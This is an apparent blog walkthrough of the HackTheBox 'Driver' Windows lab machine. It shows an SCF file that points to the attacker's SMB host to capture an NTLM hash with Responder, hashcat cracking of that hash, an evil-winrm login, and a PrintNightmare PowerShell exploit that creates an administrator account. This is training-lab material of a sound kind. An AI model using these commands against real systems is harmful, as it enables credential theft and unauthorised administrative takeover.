Driver — Hackthebox Walkthrough
I am happy to say that finally someone made an easy Windows box on HTB. Great thanks to @MrR3boot for that. I loved this box as it had a pretty unique attack path and didn’t need much knowledge about Windows Specifics.
User
Starting off with nmap I saw there were couple of ports open. Port 80,5985 (HTTP) and 135,445(SMB).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Visiting the web server on port 80, it was a static website about firmware updates in printers. Looking around a bit, I saw a page that allowed me to upload firmwares.
Since the page stated that the uploaded files are stored in a file share and manually checked, I knew this had something to do with the SMB server we saw in the nmap results.
However, I tried uploading PHP reverse shells to see if I can get a shell that was but that was a bust. So I had to do some digging. While I was looking, I came across this article which explains about SFC file attacks with SMB shares.
As mentioned in the article, I made a SFC file called “attack.sfc”.
[Shell]
Command=2
IconFile=\\10.10.14.235\test\test.ico
[Taskbar]
Command=ToggleDesktop
Then I started a responder.
sudo responder -I tun0 -vv
Finally I uploaded the the attack.sfc file I made. Then I got the NTLM hash of the tony user.
What seems to have happened was, when the attack.sfc file is uploaded, the tony user must have logged in to SMB server and browsed the file. Since the Iconfile had a pointer to our SMB server, responder was able to catch the hash of the tony user.
Then I used hashcat to crack the captured hash.
hashcat -m 5600 --force hash.txt rockyou.txt
I got the password as liltony. With this, I used evil-winrm and logged in to the box as tony.
evil-winrm.rb -u tony -p liltony -i 10.10.11.106
Root
First off, I uploaded and ran winpeas.exe for basic enumeration. There were no any eye-catching vulnerabilities to find but I saw “spoolsv” was running.
So I googled about this and found put about a CVE. This was called PrintNightmare. Just like the name rhymes, this exploits a native built-in Windows service named “Print Spooler” that is enabled by default on Windows machines.
With a little effort, I found a Powershell exploit from GitHub to exploit this.
So I cloned this repository and uploaded the Powershell script to the box. But before running the script I had to do some changes to the Execution Policy to be able to import the Powershell module I uploaded.
set-ExecutionPolicy RemoteSigned -Scope CurrentUser
Then as mentioned in the README.md I imported the Powershell script and ran it.
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare
The script added a new user to the administrator group called adm1n
with a password of P@ssw0rd
. Finally, I was able to log in with those credentials and get administrative access to the machine.
Rooted!!!
“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”
Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Happy Hacking !!! 😄